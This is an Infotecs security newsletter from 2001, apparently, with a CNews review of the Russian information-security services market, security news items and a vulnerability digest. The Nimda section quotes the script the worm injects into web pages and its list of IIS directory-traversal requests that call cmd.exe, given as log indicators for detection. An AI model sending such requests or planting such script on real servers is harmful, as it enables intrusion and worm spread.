Защита информации, виртуальные частные сети (VPN). Технология ViPNet.

Здравствуйте, уважаемые подписчики! 
Приветствую Вас после непродолжительного перерыва, вызванного моим отпуском.

В условиях современного бизнеса многие компании, используя преимущества онлайновых моделей, предоставляют своим заказчикам, партнерам и поставщикам возможность удаленного доступа к собственным информационным ресурсам. Естественно, помимо новых возможностей, это порождает новые опасности и обязанности по защите информации и ресурсов. Именно это стало причиной значительно возросшего спроса со стороны рынка на системы информационной безопасности (ИБ), позволяющие обнаруживать и пресекать попытки повреждения и несанкционированного доступа к информации, но в тоже время оставляющие возможность защищенного соединения с пользователями и партнерами по бизнесу.
В сегодняшнем выпуске рассылки предлагаем Вам "Обзор рынка комплексных систем информационной безопасности", подготовленный авторским коллективом CNews.ru.

Как обычно в рассылке, свежие новости из области защиты информации и IT-технологий, информационные сообщения по новым атакам и способам взлома, статистика по инцидентам, а также новости компании Инфотекс.

Информационные сообщения по новым атакам и способам взлома, статистика по инцидентам

• [Aug29 -Sep19] Security Info digest #38
  
  

Новости компании Инфотекс

• ОАО "Инфотекс" приглашает на работу сервис-специалиста в отдел сопровождения и клиентских проектов.

Введение
Рынок систем защиты информации можно условно разделить на два, совершенно различных сегмента: первый, о котором все говорят, который понятен, который уже давно сформировался - продуктовый рынок, и второй - молодой и неокрепший рынок комплексных систем информационной безопасности, фактически рынок консалтинговых услуг. И эти два сегмента нельзя путать, они различны по своему составу, характеристикам, методам продвижения продукции/услуг.

Рынок комплексных систем защиты информации начал зарождаться в конце 1998 - начале 1999 года благодаря тому, что:
- область IT вышла на качественно новый уровень, начала серьезно проникать в бизнес-процессы крупных предприятий и организаций;
- проблема сохранности конфиденциальной информации начала выходить на первый план;
- средства защиты информации настолько усложнились, что квалифицированно установить их в корпоративной системе могли только профессионалы;
- система защиты информации перестала быть просто совокупностью каких-либо средств защиты, их эффективное объединение имело под собой синергетическую основу;
- качественный комплексный проект требовал серьезной научно-методической базы, привлечения широкого круга специалистов по информационной безопасности..

То есть начал формироваться даже пока не спрос, а скорее интерес к теме информационной безопасности, появилось понимание того, что защита информации - это не просто набор продуктов. И лишь значительно позже заказчики начали понимать, что помимо "коробок" необходимо покупать и услуги по проектированию и внедрению систем информационной безопасности - как взаимоувязанного комплекса организационных, процедурных и программно-аппаратных мер защиты. Прежние структуры, исконно занимавшиеся защитой информации (режимно-секретные органы, первые отделы), уже не могли разработать такой системы - слишком быстро развивалась технология, слишком много появлялось новых угроз информации, общедоступные сети стали неотъемлемой частью корпоративных систем.

Нельзя сказать, что к настоящему моменту рынок комплексных систем окончательно сформировался - нет, он еще не набрал той силы, которая позволила бы противостоять "сезонным" колебаниям, не перестал быть той статьей расходов, которая может быть сокращена в случае нехватки средств. Он всё еще продолжает быть зависимым от продуктового рынка. Основной бизнес крупных компаний - это всё же продажа/производство/дистрибуция средств защиты информации. Часто консалтинговые услуги оказываются на начальном преддоговорном этапе, то есть они, как правило, бесплатны и имеют своей целью убедить заказчика купить тот или иной продукт. Однако буквально в последний год всё большим спросом пользуются действительно независимый консалтинг - обследование информационных систем, их аудит, проектирование комплексных систем информационной безопасности.

Основные предложения на рынке систем информационной безопасности
Предлагаемые на рынке услуги можно разделить на несколько крупных классов, в соответствии с этапами работ по защите информации:

• обследование организации.
  Услуги по обследованию организации могут достаточно сильно различаться у разных поставщиков услуг. Это может быть анализ защищенности вычислительной системы, обследование вычислительной системы (гораздо более глубокий уровень детализации), обследование организации в целом, т.е. охват "бумажного" документооборота и бизнес-процессов организации с точки зрения информационной безопасности, проверка на соответствие нормативно-правовым документам и т.п.;
• проектирование системы защиты информации.
  При проектировании системы информационной безопасности могут быть охвачены как все три уровня мер защиты - организационного, процедурного и программно-аппаратного, так и исключительно технический уровень. Это два принципиально разных типа работ и по сути, и по объемам, т.к. первый предполагает разработку концепции информационной безопасности, нормативно-распорядительных документов, различных регламентов и только потом - технического проекта;
• внедрение системы защиты информации -
  заказчику выгодно использовать подрядную организации и не иметь проблем с единовременным привлечением большого количества специалистов по информационной безопасности, контролем качества выполняемых работ, выработкой единой политики безопасности;
• сопровождение системы информационной безопасности -
  оперативное реагирование на внештатные ситуации, периодическое обновление специального ПО, установка необходимых "заплат" на общесистемное ПО, отслеживание появления новых атак и уязвимостей, т.е. в предельном случае аутсорсинг работ по защите информации;
• обучение специалистов по защите информации,
  руководителей служб безопасности, руководителей IT-подразделений, пользователей средств защиты.

Потребители рынка систем информационной безопасности
Кто же является потребителем таких услуг? Первый класс компаний - это отраслеобразующие заказчики, которые, как правило, имеют собственные команды специалистов, способные самостоятельно проектировать и поддерживать системы защиты информации, формировать политику безопасности, вплоть до выпуска собственных отраслевых стандартов. Такие компании пользуются внешними услугами только на конкретных участках работ и, как правило, не отдают внешним компаниям решение концептуальных вопросов.

Следующим классом являются заказчики так называемого "закрытого" рынка, предприятия Министерства обороны, Минатома и т.п., основной защищаемой информацией которых является государственная тайна. Это достаточно большой рынок с большим объемом и интеграционных и научно-исследовательских работ, однако круг компаний, работающих на нем, жестко ограничен - это государственные унитарные предприятия, бывшие НИИ и очень редко - коммерческие организации.

Основным же потребителем дорогих комплексных услуг по защите информации являются крупные государственные и коммерческие компании. Такие компании имеют развитые вычислительные системы, мощные телекоммуникационные структуры, многие бизнес-процессы таких компаний автоматизированы. Как правило, крупные организации самостоятельно вопросы информационной безопасности не решают, а привлекают сторонние специализированные организации. Заказчики готовы платить немалые деньги за уверенность в качественной и надежной системе защиты информации. Системные интеграторы выполняют работы по полному циклу, начиная с обследования и заканчивая сдачей системы "под ключ".

Средние компании с количеством сотрудников порядка 50 - 100 человек также начинают переключать свой интерес от исключительно продуктового рынка к комплексным решениям, по прогнозам, как раз именно этот сегмент рынка будет самым бурно растущим. Однако сейчас он практически не сформирован, т.к. традиционные услуги по созданию систем, предлагаемые крупным компаниям, для этого рынка не приемлемы из-за высокой стоимости, а поставщики услуг пока не нашли эффективных способов продвижения. Средние компании, как правило, не могут платить за чистые услуги, бюджет на информационную безопасность включен в общий IT бюджет, сам по себе не очень большой, и IT-руководитель, на которого возложено обеспечение безопасности, должен решить, как за небольшие деньги получить и качественный консалтинг, и необходимые продукты. Видимо, лучшим выходом здесь является предложение на этот рынок типовых решений, например, "Защита от атак из Интернет" или "Защита корпоративной системы передачи данных" и т.п., то есть предложение заказчику некого стандартного (но достаточно гибкого) решения, в цену которого уже заложено и оборудование и услуги по внедрению. Это, во-первых даст заказчику нечто осязаемое, отработанное на испытательном стенде и на других объектах, и, во-вторых, не оставит его один на один с набором "коробок", которые необходимо как-то внедрить. Стоимость таких решений не должна превышать 30 - 50 тысяч долларов.

И последний класс компаний, не рассматриваемых здесь, - мелкие фирмы, которые пока не могут дать компания-интеграторам ощутимой прибавки к объему. Такие фирмы ориентированы исключительно на продуктовый рынок, и пока практически никто из участников рынка не готов инвестировать в его развитие.

Игроки рынка СИБ
Исторически первыми на этом рынке, еще когда рынка не было как такового, были закрытые государственные НИИ, ведущие те или иные разработки в области защиты информации, проектные институты. Эти организации обладают очень высоким научным потенциалом. В настоящее время они обслуживают "закрытый" рынок и практически не выходят за его рамки.

Очень большой класс компаний, работающих на рынке интеграционных проектов, представляют производители средств защиты, имеющие в своем составе проектную группу. Компании-производители достаточно давно работают на этом рынке и накопили обширный опыт по проектированию систем, однако они стараются строить комплексные проекты на собственной линейке продуктов и практически не внедряют "чужие" решения. Это объясняется и технологией организации работы, и отсутствием связей с другими производителями, часто являющимися конкурентами.

Правильно ли в одной компании иметь два направления? В данной ситуации играют роль следующие факторы. Первый - каждый производитель средств защиты старается стать "правильным вендором", то есть отстроить эффективные каналы дистрибуции и перенести основной объем с прямых продаж на продажи через партнеров, что сильно сократит его затраты. А таким партнерами в основном являются как раз системные интеграторы, основной бизнес которых заключается в создании комплексных проектов. Таким образом, производитель, имея в своем составе проектную группу и самостоятельно занимаясь интеграцией, добивается двух отрицательных результатов: становится конкурентом потенциальному партнеру-интегратору, и подрывает сам рынок, предлагая однобокие проекты, часто дискредитирующие идею интеграции.

Второй же фактор таков, что проектная деятельность приносит производителю до 40% его годового объема, от которых никто отказываться не хочет. Это то и позволяет сейчас сохраняться такой ситуации, когда производитель конкурирует со своими поставщиками, участвуя в различных тендерах, может снижать цены не просто в разы, а на порядки, тем самым препятствуя формированию рынка. Подобная ситуация будет сохраняться до тех пор, пока не наберет силу рынок системной интеграции, пока заказчик не поверит в него, пока доходы производителя от проектной деятельности не упадут настолько , что перестанут интересовать производителя.

В последние несколько лет большинство системных интеграторов, IT-холдингов, которые по сути всегда работали над комплексными проектами, начали создавать в своем составе подразделения, строящие системы информационной безопасности. Это вполне объяснимо, т.к. ни одна действительно серьезная информационная система не может существовать без системы защиты. Такие подразделения, как правило, не имеют собственных продуктов и поэтому могут достаточно объективно предлагать заказчику решения по защите информации. Структура компаний-интеграторов, создаваемая под проектную деятельность, то есть эффективное объединение и внедрение продуктов от различных производителей, достаточно оптимальна для разработки комплексных систем информационной безопасности.

Существуют ли "чистые консалтинговые" компании, занимающиеся исключительно системной интеграцией и консалтингом в области защиты информации? Видимо пока они не могут самостоятельно существовать на рынке, т.к. спрос только формируется, и прибыльность "чистой" интеграции будет незначительной. А, как известно, консалтинг по безопасности требует высококлассных дорогих специалистов и наукоемких технологий, всё это под силу только большой компании. Таким образом, у подобных компаний есть два пути развития для удержания на рынке: либо искать поддержки у больших компаний-интеграторов, либо заниматься дистрибуцией какого-либо продукта по защите информации, в результате чего они перестанут быть консалтинговой компанией.

В настоящее время можно рассматривать еще один класс участников рынка - это различные объединения и альянсы, консолидирующие усилия производителей, интеграторов для достижения тех или иных целей. Как правило, флагом и главной целью таких объединений является формирование рынка. Однако действительной силы такие объединения пока не представляют, это либо сотрудничество на техническом уровне, в результате которого появляется некий "бандл" (bundle), объединяющий в одной коробке несколько взаимодополняющих продуктов разных производителей, либо просто формальное заявление о сотрудничестве и дружбе, выливающееся в совместные PR-акции и, максимум, запуск продуктов партнера в свои каналы сбыта. То есть своей стратегической цели такие объединения не достигают. Это объясняется тем, что участники объединений не готовы брать на себя каких либо обязательств, они не желают ограничивать свободу своего бизнеса в некоторые даже очень широкие рамки. Ведь рынок сейчас растет сам по себе - это объективная ситуация и от участников рынка требуется не мешать ему, не ломать его, не демпинговать, давать рынку правильно развиваться.

Подходы к проектированию систем информационной безопасности
Сейчас на рынке можно выделить три типа поставщиков комплексных систем информационной безопасности, предлагающих три различных концептуальных подхода к проектированию систем защиты:

Подход первый: "от продукта". Этого подхода придерживаются, как правило, компании-производители, имеющие в своем составе проектную группу. Фактически, в таких компаниях интеграция выросла из просто внедренческого направления, в тот момент, когда заказчик попросил не просто продукт, а проект. Таким образом, вся технология проектирования ориентирована на то, чтобы продукт, производимый компанией, являлся центральным вне зависимости от решаемой задачи. Данный подход не всегда реально обоснован, особенно в условиях агрессивного маркетинга и позиционирования продукта, как "панацеи" от большинства угроз безопасности.

Однако, в случае, когда заказчик обладает достаточной квалификацией, чтобы широко смотреть на проблему защиты информации в целом и избегать однобоких решений, реализуются проекты высокого качества, что понятно - никто кроме производителя не знает продукта лучше. Но в этом случае требуется либо наличие собственных высококлассных специалистов, системных архитекторов, либо привлечение внешних консалтинговых компаний.

Позиция вторая - компания выступает поставщиком решений в области защиты информации. Понимая отсутствие единого продукта, защищающего от всех угроз, компания предлагает комплексное решение проблемы. Оно состоит из комбинации нескольких технологий защиты, например, межсетевых экранов для защиты от атак из интернета, VPN - для закрытия каналов связи и т.п. Вот, казалось бы, оптимальная позиция: каждая технология, каждый продукт занимает свою нишу и закрывают определенные угрозы. Но тут существует одна проблема.

Формально схема выглядит следующим образом: сейчас существуют четыре основные технологии защиты - межсетевое экранирование, VPN, криптографическая защита, активный аудит. В каждой технологии есть по 3-4 действительно работающих продукта. То есть, четыре технологии по четыре продукта образуют 16 кубиков, из которых может строиться система безопасности. Тогда задача архитектора системы защиты сводится к тому, чтобы найти, куда пристроить каждый кубик. Возникает искушение начинать строить систему, отталкиваясь не от потребностей заказчика, а от имеющихся в наличии средств защиты.

Может быть, такая технология работы была бы оправдана в условиях полностью электронного документооборота в организации, но российские реалии таковы, что большинство компьютерных систем в наших организациях представляет собой 300-400 печатных машинок, объединенных сетью. В условиях бумажного документооборота все документы готовятся на компьютере, распечатываются, а потом в бумажном виде движутся по организации. В сети существуют лишь очаги автоматизации, например, в бухгалтерии, в конструкторском отделе и т.п. А все остальные сотрудники общаются друг с другом, в лучшем случае, по e-mail или через общие папки. Поэтому бывает трудно объяснить, зачем использовать, например, VPN, если вся информация отправляется по почте или факсу. Или зачем устанавливать на компьютеры электронные замки, если все документы хранятся в shared папках, не закрыты паролями, и их может получить практически любой сотрудник.

Нельзя говорить, что подход от "кубиков" не приемлем и не жизнеспособен. В настоящее время существует большой неосвоенный рынок средних и мелких компаний, для которых слишком дорого покупать серьезные консалтинговые услуги компаний-интеграторов. Таким компаниям как раз и нужен некоторый набор продуктов и решений, которые могли бы просто объединяться в систему, придавая ей необходимую функциональность.

И существует третья позиция - самая сложная и достаточно редко встречающаяся на нашем рынке. Какова стандартная схема продажи некоторого продукта или системы? Поставщик приходит к заказчику, изучает его проблему и предлагает то или иное решение, продукт или варианты решения, либо заказчик организует тендер, получает несколько предложений. И в том и в другом случае заказчик самостоятельно принимает решение о том какую систему, технологию внедрять. Т.е. ответственность за принятие решений по защите информации возлагается на заказчика, который, вообще говоря, не является экспертом в области защиты информации. Самая сложная задача, которая может и должна стоять перед компанией-интегратором, - это принять на себя ответственность за выбор стратегии обеспечения безопасности организации, развитие системы, ее адекватность развивающимся технологиям. Системный интегратор должен реализовывать единую комплексную политику, как техническую, так и организационную, проводя ее на всех уровнях организации-заказчика.

Перед выработкой решения по информационной безопасности интегратор должен провести всестороннее глубокое обследование не просто информационной системы заказчика, а всей "информационной жизни" организации. Обследование должно вестись на трех уровнях: на уровне бизнес-процессов, который выявляет документальные потоки, типы обрабатываемой информации, уровни ее конфиденциальности; на инфраструктурном уровне - для выявления уязвимостей серверного парка, сетевого оборудования; на уровне приложений, на котором выявляются уязвимости в программном обеспечении, ошибки в настройках механизмов разграничения доступа и др.

На основе полученных данных необходимо формировать сначала концептуальное решение по защите информации, состоящее из комплекса организационных, процедурных и программно-аппаратных мер защиты, а затем, четко обосновывая выбор, предлагать внедрение тех или иных технологий защиты. При этом нужно учитывать, что подсистема информационной безопасности является поддерживающей системой по отношению ко всей информационной системе организации. Она не должна играть доминирующую роль в развитии организации и ее информационной системы. То есть система информационной безопасности должна защищать информацию, обеспечивающую бизнес-задачи организации.

Таким образом, любая система информационной безопасности, защищающая крупную организацию с распределенной информационной системой, или система, представляющая собой один межсетевой экран, должна быть разумно достаточной по отношению к организации, она не должна мешать работе сотрудников. Всегда должен быть адекватный выбор уровня защиты, правильный выбор технологий и средств защиты.

Заключение
В заключение хотелось бы дать количественную оценку объема российского рынка. Это задача достаточно не простая, а тем более в условиях только формирующегося рынка. В настоящее время рынок систем информационной безопасности практически не отделим от продуктового, консалтинг часто идет условно бесплатным, а его стоимость включается в стоимость поставки оборудования. Системные интеграторы помимо проектов занимаются продажей, дистрибуцией средств защиты. Участники рынка либо не показывают своих объемов, либо завышают их. Объемы "закрытого" рынка практически невозможно оценить из-за отсутствия информации по этой теме, можно лишь построить интегральную оценку объема, исходя из примерной численности работающих на этом рынке специалистов. Можно предположить, что объем рынка составляет порядка 20 миллионов долларов. При этом рост, прогнозируемый аналитиками, может составлять около 30% в год, а по некоторым оптимистичным оценкам объем рынка в ближайшие годы может вырасти в разы.

Обзор подготовлен редакцией CNews.

"Лаборатория Касперского", российский разработчик систем информационной безопасности, сообщила, что сегодня неизвестные злоумышленники произвели массовую рассылку троянской программы DLER по электронной почте.

Рассылаемые письма ничем не отличаются от типичного спама, который предлагает схему быстрого обогащения, однако, после их получения у пользователей остается не только раздражение от получения очередного спама, но и "троянец", поселившийся на компьютере. Письма приходят с адреса freemoney@df.ru, в поле тема указано: Информация.

В самом тексте письма говорится, в частности: "Я хочу поделиться с Вами информацией и особенно с теми из Вас, кто занимается бизнесом или каким-то боком с ним сталкивается. Если у Вас проблемы с поставкой товара или же Вам его хочется купить больше, но не получается - прочтите внимательно прикрепленный к письму файл сами и дайте задание тому человеку, который у Вас отвечает за компьютеры и все что связано с ними".

Письмо заканчивается словами: "Внимательно прочитайте прикрепленный файл business.doc. В нем содержится вся необходимая информация. Перед отправкой файл был проверен на наличие вирусов: вирусов нет. ЕСЛИ ВАС ЭТО НЕ ИНТЕРЕСУЕТ - ПРОСЬБА НЕ ОТВЕЧАТЬ НА ЭТО ПИСЬМО!"

Сообщение имеет формат HTML. Одним из компонентов письма является внедренный EXE-файл, который содержит вредоносную программу DLER, принадлежащую к классу Trojan Downloader. Если на компьютере не установлена специальная "заплатка" для системы безопасности Internet Explorer, то этот файл автоматически запускается при чтении письма. Такую же технологию проникновения на компьютеры использует печально известный интернет-червь Nimda, недавно вызвавший глобальную эпидемию.

Будучи активированным, DLER внедряется в систему и, опять же, незаметно для пользователя, загружает с удаленного веб-сайта другую троянскую программу Hooker и также внедряет ее на компьютер жертвы. В свою очередь Hooker собирает персональные данные пользователя зараженной машины (имя, адрес, пароли доступа и др.), перехватывает все нажатия клавиш, записывает эти данные в служебный файл и регулярно отсылает его злоумышленникам по электронной почте. Таким образом, к компьютеру могут получить доступ нежелательные лица, также может произойти утечка важной конфиденциальной информации.

Если Вы получили письмо описанного выше содержания, то необходимо его немедленно удалить. Если же на Вашем компьютере не установлена "заплатка", то рекомендуется провести полную проверку компьютера антивирусной программой с последними обновлениями базы данных.

Это первый случай в Рунете, когда троянская программа распространяется таким нетривиальным, но исключительно эффективным способом. "Хорошо известно, что пользователи часто игнорируют советы антивирусных компаний и редко устанавливают обновления к используемому ПО. Так что сегодня большинство компьютеров с точки зрения их безопасности можно сравнить с дуршлагом", - комментирует Денис Зенкин, руководитель информационной службы "Лаборатории Касперского". Вирусописатели достаточно быстро поняли сложившуюся ситуацию и теперь практически каждый "громкий" вирус (например, Code Red, Nimda, Code Blue и др.) использует уязвимости того или иного ПО. "Мы прогнозируем, что в будущем такой способ проникновения вредоносных программ на компьютеры станет преобладающим. В этой связи немедленная установка обновлений и "патчей" становится одним из основным правил надежной защиты компьютеров", - сказал Евгений Касперский, руководитель антивирусных исследований компании.
(источник - http://www.cnews.ru/, опубликовано 12.10.2001)

Microsoft был вынужден срочно "залатать" дыры во внутренней службе поддержки пользователей после того, как его проинформировали о возможности поиска по базе данных клиентов компании. Данные по кредитным карточкам не были доступны, однако, поиск по именам и личным данным, таким как номера телефонов, адреса и покупательская активность, вполне можно было осуществить.

Об этом сообщил компании уже успевший прославиться своей деятельностью по поиску брешей в безопасности хакер Адриан Ламо (Adrian Lamo). 20-летний хакер, который недавно занимался изменениями новостей Yahoo!, сообщил, что ему удалось получить доступ к сайту для внутреннего пользования, который позволял любому загружать личные данные о любом пользователе, который оформлял бланк заказа продуктов компании Microsoft через e-mail.

Сайт даже не надо было "хакать" - фактически, о его безопасности никто и не задумывался, полагаясь на то, что адрес сайта никогда и нигде не афишировался! Microsoft удалил сайт сразу же после того, как был проинформирован о наличии проблемы. Ламо удалось найти его простым перебором комбинаций известных IP-адресов Microsoft. Неизвестно, как долго данные клиентов компании находились в таком открытом доступе, однако, Ламо уверяет, что база данных была весьма обширной.
(источник - http://www.cnews.ru/, опубликовано 11.10.2001)

Интернетчиков лишили анонимности

22 октября самый известный онлайновый анонимайзер Freedom Network прекратит свою работу. Сервис, позволявший пользователям интернета анонимно путешествовать по Сети, обмениваться электронной почтой и общаться в конференциях, закрывается по финансовым причинам.

Freedom Network, проект компании Zero-Knowledge Systems, считается лидером на данном рынке, поскольку с его помощью пользователи интернета получают полную анонимность. Абсолютной секретности удается достичь благодаря использованию клиентской программы, направляющей весь трафик пользователя через цепочку специальных серверов, расположенных у провайдеров из разных стран мира. Эта цепочка фактически представляет собой многоуровневый транскодер, имеющий 128-битные ключи шифрования, которые меняются на каждом из уровней. Операторы ни одного из промежуточных серверов, через которые проходит трафик пользователей анонимайзера, не имеют возможности прочитать ни получаемые, ни отправляемые пользователями Freedom Network данные. В добавление к этому в анонимайзере используются специальные средства, маскирующие маршрут веб-серфера.

Для пользования анонимайзером не нужно было предоставлять никаких реальных данных о себе, достаточно выбрать псевдоним (nym). Пользователи, стремящиеся к суперсекретности, могли взять до пяти псевдонимов, которые можно было использовать для разных целей.

Zero-Knowledge Systems сетует на то, что, хотя проект был интересен пользователям Сети, платить за его использование они не спешили. За два года существования Freedom Network число его подписчиков достигло 70 тысяч человек, однако, вносить абонентскую плату выразила желание их меньшая часть. Возможность пользоваться одним псевдонимном в течение пяти лет стоила $50, а пятью - $50 за год.
(источник - http://www.cnews.ru/, опубликовано 05.10.2001)

Американский Институт системного администрирования, компьютерных сетей и безопасности (SANS) на этой неделе представил список самых слабых мест защиты данных в глобальной Сети, которые принесли наибольший урон за прошедший год. В этом году список состоит из 20 уязвимостей. SANS совместно с ФБР рекомендует специалистам по безопасности компаний обратить особое внимание на эту двадцатку.

В представленном списке 6 проблем являются характерными для серверов Microsoft, 7 относятся к различным вариациям Unix, включая Linux и Solaris. Остальные 7 имеют общий характер. Представленные 20 проблем не ранжированны по значимости между собой.

В списке отмечено достаточно много общих и банальных вещей, которые являются следствием невнимательности и даже безответственности системных администраторов. Наиболее общие уязвимости идут в начале списка.

Под номером 1 представлены дыры, связанные с разнообразными дополнительными активизированными программами и скриптами. С одной стороны, они поставляются для облегчения инсталляции ПО и придания ему большей функциональности, с другой - пользователю они часто не нужны, и он может даже и не знать об их наличии.

Продавец старается снабдить свой продукт максимальным количеством всевозможных "наворотов", расчитывая, что пользователь сам будет отключать их в случае ненадобности. Установки по умолчанию отставляют открытыми порты и активизированными демонстрационные скрипты, которые позволяют хакерам и вредоносным программам проникать в системы.

Далее обозначена проблема слабой защиты паролями или вообще отсутствие таковой. В основном, речь идет о неправильной организации системы идентификации и неудачном выборе паролей.

Затем указана ненадежная система резервирования и восстановления информации. Большие потери несут компании, когда после аварии или сбоя информацию восстановить не удается. Это случается даже там, где резервирование делается ежедневно, однако механизм восстановления с резервных копий никогда не проверялся.

В списке уязвимых мест обозначено также большое количество открытых портов и другие более специфические вещи.
(источник - http://www.netoscope.ru/, опубликовано 04.10.2001)

[Aug29 - Sep19] Security Info digest #38(по материалам Аналитического центра компьютерной безопасности (АЦ) www.sert.ru)

Обнаружен червь Nimda, который потенциально опасен как пользователям рабочих станций (Windows 95, 98, ME, NT или 2000), так и серверам на базе Windows NT и 2000.
Nimda умеет размножаться различными механизмами:
- от клиента к клиенту через почту
- от клиента к клиенту через открытые сетевые диски (network shares)
- от веб сервера к клиенту при просмотре затрояненых веб сайтов
- от клинета к вебсерверу через "Microsoft IIS 4.0 / 5.0 directory
traversal" уязвимость
- от клиента к серверу при сканировании входов, оставленых "Red Code II" и "sadmind/IIS" червями.

Кроме того, появились сообщения о DDoS, вызываемой сетевым сканированием и рассылками email.
Червь приходит в письме с MIME "multipart/alternative" сообщением, содержащем две части: первая MIME type "text/html" пустая, а во второй типа MIME type "audio/x-wav", содержится запускаемый файл "readme.exe" в base64 кодировке.

Благодаря описанной в CA-2001-06 уязвимости (Автоматический запуск вложенных MIME типов), програмное
обеспечение, использующее Microsoft Internet Explorer 5.5 SP1 или более раннюю версию (кроме IE 5.01 SP2), далее
аттачмент выполняется и инфицирует систему.

Инфицированные клиенские машины пытаются рассылать копии Nimda по адресам, найденным в книге адресов Windows.

Помимо того, зараженные клиенские машины начинают сканирование сети на предмет уязвимости в IIS серверах. Nimda ведет активный поиск входов, установленных предыдущими IIS червями: Code Red II [IN-2001-09]
и sadmind/IIS червь CA-2001-11.
Так же, для проникновения в систему червь пытается использовать IIS Directory Traversal уязвимость [VU #111677].

Инфицированный Nimdой клиент передает код вируса серверу, которого он находит при сканировании. Как только вирус запускается на сервере, он проходит каждую директорию (включая доступные каталоги, монтируемые сетевые диски) и записывают свою копию в файл "README.EML". В случае, когда каталог содержит веб-содержимое (HTML или ASP файлы) найден, в эти файлы добавляется следующий кусок кода на Javascript:

<script language="JavaScript">
window.open("readme.eml", null,"resizable=no,top=6000,left=6000")
</script>

Такая модификация веб контента обеспечивает дальнейшее распространение вируса новым клиентам.

При инфицировании Nimda модифицирует все файлы, связанные с веб технологиями, которые он находит (включая, но не ограничиваясь файлами с .htm, .html, и .asp расширениями). В результате таких действий пользователь может получить копию червя.

Червь Nimda создает весьма большое количество копий самого себя (под именем README.EML) во всех доступных каталогах (включая каталоги на сетевых дисках).
Если пользователь просматривает файл, содержащий копию червя на сетевом диске, в Windows Explorer с включенной возможностью "preview", червь способен заразить таковую систему.

Активность сканера Nimda оставляет следующее содержимое в лог-файлах веб-серверов на 80/tcp порту:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/.%5c./winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/.%5c./.%5c./.%5c./winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/.%5c./.%5c./.%5c./winnt/system32/cmd.exe?/c+dir
GET /msadc/.%5c./.%5c./.%5c/.\xc1\x1c./.\xc1\x1c./.\xc1\x1c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.\xc1\x1c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.\xc0/./winnt/system32/cmd.exe?/c+dir
GET /scripts/.\xc0\xaf./winnt/system32/cmd.exe?/c+dir
GET /scripts/.\xc1\x9c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.%35c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.%35c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.%5c./winnt/system32/cmd.exe?/c+dir
GET /scripts/.%2f./winnt/system32/cmd.exe?/c+dir

Отметим, что первые четыре запроса в этом примере являются попытками соединиться со входом, оставленным Code Red II.
Подробнее:
http://www.cert.org/advisories/CA-2001-26.html

В сервере поддержки печати (lpd или in.lpd) обнаружено удаленное и локальное переполнение буфера.
Уязвимости подвержены OpenBSD CURRENT и более ранние версии, FreeBSD 4.3 и более ранние версии, NetBSD 1.5.1 и ранние
версии, BSD/OS 4.1 и предшествующие ей версии, а так же SunOS версий 5.8, 5.8_x86, 5.7, 5.7_x86, 5.6, 5.6_x86.
Следует отметить, что BSD/OS 4.2 не подвержена уязвимости.

Необходимые патчи можно скачать здесь:
- http://www.BSDI.COM/services/support/patches/patches-4.1/M410-044
- http://www.openbsd.com/errata.html
- http://www.netbsd.org/security
- http://www.freebsd.org/security
- http://www.securityfocus.com/archive/1/211205
Подробнее:
http://www.securityfocus.com/archive/1/210937

В sendmail обнаружена уязвимость, позволяющая при наличии локального доступа к системе и наличии SUID root у sendmail получить уровень прав пользователя root.
Уязвимости подвержены sendmail начиная с версии 8.10.0 и до 8.11.5. Отметим, что уязвимость исправлена в sendmail версии 8.11.6.
Подробнее:
http://www.securityfocus.com/archive/1/212398

ОАО "Инфотекс" приглашает на работу сервис-специалиста в отдел сопровождения и клиентских проектов.

Описание должности:
- работа на "горячей" телефонной линии
- установка, наладка, конфигурирование программных решений компании "Инфотекс" на основе контрактов по установке и обслуживанию
- сервисное сопровождение Клиентов: по телефону, электронной почте, путем выезда к Клиенту (возможны выезды за пределы Москвы)
- сопровождение выпуска, передача и установка новых версий программных решений компании
- проведение учебных занятий в учебном классе компании или на территории заказчика

Требования к кандидату:
- знание внутреннего устройства Интернет, протоколов TCP/IP, протоколов высокого уровня HTTP, FTP, SMTP, POP, IMAP, NetBIOS и др.; знание сетевых технологий (Proxy/Firewall, Internet) и, желательно, криптографии
- отличное знание операционных систем Windows 95/98, Windows NT/2000; инсталляция и настройка
- умение работать с людьми (ведение переговоров, проведение учебных занятий и т.д.)
- знание технического английского (умение читать и переводить английскую документацию на ПО)
- отсутствие проблем со службой в рядах вооруженных сил РФ
- образование высшее

Резюме просьба направлять по адресу hotline@infotecs.ru

Полнофункциональные демо-версии продуктов ViPNet Desk, TermiNet, ViPNet Office, ViPNet Tunnel находятся по адресу 
http://www.infotecs.ru/demo.htm

Если у вас есть какие-нибудь пожелания или вопросы по поводу дальнейших выпусков рассылки, мы с удовольствием рассмотрим их.